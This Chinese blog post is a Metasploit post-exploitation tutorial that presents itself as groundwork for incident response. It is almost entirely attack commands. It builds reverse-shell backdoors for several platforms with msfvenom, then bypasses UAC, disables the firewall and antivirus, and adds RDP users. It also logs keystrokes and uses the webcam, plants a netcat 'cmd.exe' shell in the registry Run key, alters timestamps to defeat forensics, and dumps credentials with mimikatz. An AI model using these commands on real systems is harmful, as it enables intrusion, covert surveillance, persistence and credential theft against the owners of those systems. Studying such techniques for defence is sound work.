从后渗透分析应急响应的那些事儿(一)基础入侵篇

首发于freebuf Tidesec专栏,转载到个人博客记录一下。

不知攻,焉知防。作为安服攻城狮,在学习应急响应之前应该先了解黑客的常见攻击手段。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。本文参考各路大佬,借助Metasploit执行一些getshell之后的常见操作,以备应急只需,新手学习,大神勿喷!

第一篇首先介绍通过msfgetshell后的常见基本操作。

首先开启msf,msfconsole

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第1张图片

 

然后“show payloads”,查看所有可用的攻击载荷的信息。

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第2张图片

 

针对几种典型后门进行介绍如下

(1)Windows后门,使用模块“windows/meterpreter/reverse_tcp”

操作命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146LPORT=44444 X >test.exe

参考链接:“https://www.0dayhack.com/post-147.html”

(2)linux后门,使用模块“linux/x86/meterpreter/shell_rverse_tcp”

操作命令:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.146LPORT=1234  X >text

参考链接:http://xiao106347.blog.163.com/blog/static/215992078201310253172937/

(3)java后门,使用模块“java/meterpreter/reverse_tcp”

操作命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=1234W >text.jar

(4)php后门,使用模块“php/meterpreter/reverse_tcp”

操作命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.146LPORT=1234 -f raw >text.php

参考链接:http://www.111cn.net/phper/phpanqn/101228.htm

(5)jsp后门,使用模块“java/jsp_shell_reverse_tcp”

操作命令:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.146LPORT=1234 R >text.jsp

参考连接:http://netsecurity.51cto.com/art/201406/442648.htm

(6)asp后门,使用模块“windows/meterpreter/reverse_tcp”

操作命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146LPORT=1234 -f asp > shell.asp

参考链接:http://www.ithao123.cn/content-10813776.html

(7)aspx后门,使用模块“windows/meterpreter/reverse_tcp”

操作命令:msfvenom -a x86 –platform win -p windows/meterpreter/reverse_tcpLHOST= 192.168.1.109 LPORT=7788 -f aspx x> /home/niexinming/back.aspx

参考链接:http://www.ithao123.cn/content-10813776.html

(8)android后门,使用模块“android/meterpreter/reverse_tcp”

命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146LPORT=1234 R >text.apk

参考https://www.0dayhack.com/post-151.html

针对Windows,绕过 UAC 的功能需在meterpreter 的shell 才能实现,常见攻击模块为“windows/meterpreter/reverse_tcp”,是一个简单的反弹shell程序,功能是反向连接shell,使用起来很稳定。当然也可以使用其它的攻击载荷,实现不同的功能。

一  生成木马

首先在我们的kali-linux下生成一个木马程序,需要设置连接我们的IP和端口。新版本已经移除metasploit-framework版本中的msfencoder和msfpayload,并使用msfvenom取代。因此我们使用msfvenom一个木马程序   。

msfvenom  -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.133.130LPORT=4444 -f exe -o test.exe

生成的木马文件在当前系统目录下test.exe,当然也可以导出到指定目录。

image.png

 

操作命令解释:

msfvenom                     –>生成木马/文件的命令
windows/x64/meterpreter/reverse_tcp    –>(生成)这样的一个木马程序,( 注意:含有x64只适用目标服务器为64位操作系统的,没有x64或者使用x86的只适用32位操作系统)
LHOST=192.168.2.146               –>设置本地IP地址
LPORT=44444                   –>设置本地端口
-f,                                      –>指定输出格式

-o,                                      –> 保存payload
test.exe                       –>生成的木马程序名字

 具体解释参数如下:

-p,–payload 指定需要使用的payload(攻击荷载)
-l, –list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-n, –nopsled 为payload预先指定一个NOP滑动长度
-f, –format 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)
-e, –encoder [encoder] 指定需要使用的encoder(编码器)
-a, –arch 指定payload的目标架构
–platform 指定payload的目标平台
-s, –space 设定有效攻击荷载的最大长度
-b, –bad-chars 设定规避字符集,比如: ‘\x00\xff’
-i, –iterations 指定payload的编码次数
-c, –add-code 指定一个附加的win32 shellcode文件
-x, –template 指定一个自定义的可执行文件作为模板
-k, –keep 保护模板程序的动作,注入的payload作为一个新的进程运行
–payload-options 列举payload的标准选项
-o, –out 保存payload
-v, –var-name 指定一个自定义的变量,以确定输出格式
–shellest 最小化生成payload
-h, –help 查看帮助选项
–help-formats 查看msf支持的输出格式列表

二 诱导点击木马(可以设置自启动),getshell

进入MSF,启用监听,当被攻击者点击该木马或者已经启动该木马,即可触发后门,实现攻击,截图如下。

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第3张图片

 

遇到虚拟机不能粘贴的问题,实现本机和虚拟机kali下文件的复制粘贴,请查考链接:https://blog.csdn.net/mengxiangjia_linxi/article/details/76711296,记得以管理员运行虚拟机。

三 绕过UAC

默认情况下,如果尝试直接利用getuid 和 getsystem 命令来提权,出现如下状况,那会应该被系统UAC拦截(用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果)

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第4张图片

 

我们来利用 meterpreter 的强大功能来进行绕过!

 

 

useexploit/windows/local/ask

show options

set session 1

exploit

 

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第5张图片

 

当我们成功执行以上命令后,我们会在目标系统上弹出一个确认框只要点击确认即可成功绕过!现在我们再来通过 getuid 和 getsystem 命令来查看当前我们的 shell 权限,getshell。

image.png

 

也可以不需要诱导被攻击这点击,可以直接绕过,那就需要使用bypassuac程序。具体参考链接如下:

四 关闭防火墙和杀软

防火墙很烦人,执行命令关闭攻击主机的防火墙:netsh firewall set opmode disable,OK!

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第6张图片从后渗透分析应急响应的那些事儿(一)基础入侵篇_第7张图片

 

如果目标管理员查看防火墙配置,发现防火墙被人为关闭,那么必定引起管理员的警惕!因此,我们还可以通过策略的添加,来隐蔽我们的行为。

netsh firewall add portopening TCP 666“VMvare” ENABLE ALL

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第8张图片

伪装成一个系统正常的进程,开启666端口进程名为VMvare,之后远程重启目标系统,并利用 NC 连接即可!

 

尝试关掉杀软:runkillav,好像关不掉最新版QQ安全管家

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第9张图片

 

五 开启3389远程桌面,添加用户

runpost/windows/manage/enable_rdp或者run getgui -e。

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第10张图片

 

使用getgui(网络映射作用的脚本)添加用户,后期通过mimikatz获取管理员密码

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第11张图片

run getgui -u admin-p admin 

 

六 截屏、记录键盘、开启摄像头

使用“screenshot”命令来进行屏幕截图并存储在我们的系统之中,通过桌面发现一些杀软等信息。

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第12张图片

 

uictl开关键盘/鼠标

uictl[enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标

uictl disablemouse  #禁用鼠标

uictl disablekeyboard  #禁用键盘

keyscan_start:开启键盘记录功能

keyscan_dump:显示捕捉到的键盘记录信息

keyscan_stop:停止键盘记录功能

webcam执行摄像头命令

webcam_list  #查看摄像头

webcam_snap   #通过摄像头拍照

webcam_stream   #通过摄像头开启视频

image.png

 

七 窃取及伪造域账户token

如果是域控服务器的话,窃取及伪造域账户 token。

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第13张图片

 

八 上传NC

上传 NC 到目标系统:

upload /usr/share/windows-binaries/nc.exeC:\\windows\\system32

枚举注册表内容(开机启动)

reg enumkey -kHKLM\\software\\microsoft\\windows\\currentversion\\run

在该注册表增加内容(开机启动)

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run-v nc -d “C:\windows\system32\nc.exe -Ldp 666 -e cmd.exe”

查看内容是否增加成功:

reg queryval -kHKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

 

九 网络嗅探抓包

下载sniffer,查看网口,然后抓包嗅探,将抓取的包保存为cap文件。

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第14张图片

 

当然,本地也可以解包:

 

 

use auxiliary/sniffer/psnuffle

set pcapfile 1.cap run

十 基于MACE时间的反电子取证

可以进行基于MACE时间的反电子取证(未测试成功):

timestomp -v secist.txt

查看当前目标文件 MACE 时间。

image.png

 

timestomp -f c:\\AVScanner.ini secist.txt (将模板文件MACE时间,复制给当前文件)

timestomp -v secist.txt

image.png

 

十一 mimikatz获取信息

下载神器 mimikatz,获取被攻击计算机信息。

load mimikatz

msv (获取 hash 值)

ssp (获取明文信息)

wdigest (获取系统账户信息)

mimikatz_command -f a:: (必须要以错误的模块来让正确的模块显示)

mimikatz_command -f hash:: (获取目标 hash)

从后渗透分析应急响应的那些事儿(一)基础入侵篇_第15张图片

 

OK,到这里,针对本台计算机的基本入侵行为到此结束,下期将针对进场隐藏、免杀木马、木马封装、内网探测等进一步分析。

你可能感兴趣的:(从后渗透分析应急响应的那些事儿(一)基础入侵篇)